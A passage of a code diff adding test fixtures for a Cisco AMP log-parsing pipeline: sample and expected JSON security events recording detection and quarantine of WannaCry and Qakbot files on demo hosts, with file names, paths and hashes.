"id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782270", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500253189Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419229335730782000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419229331435814969", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log new file mode 100644 index 00000000000..6ccff00d38b --- /dev/null +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log 
@@ -0,0 +1,53 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
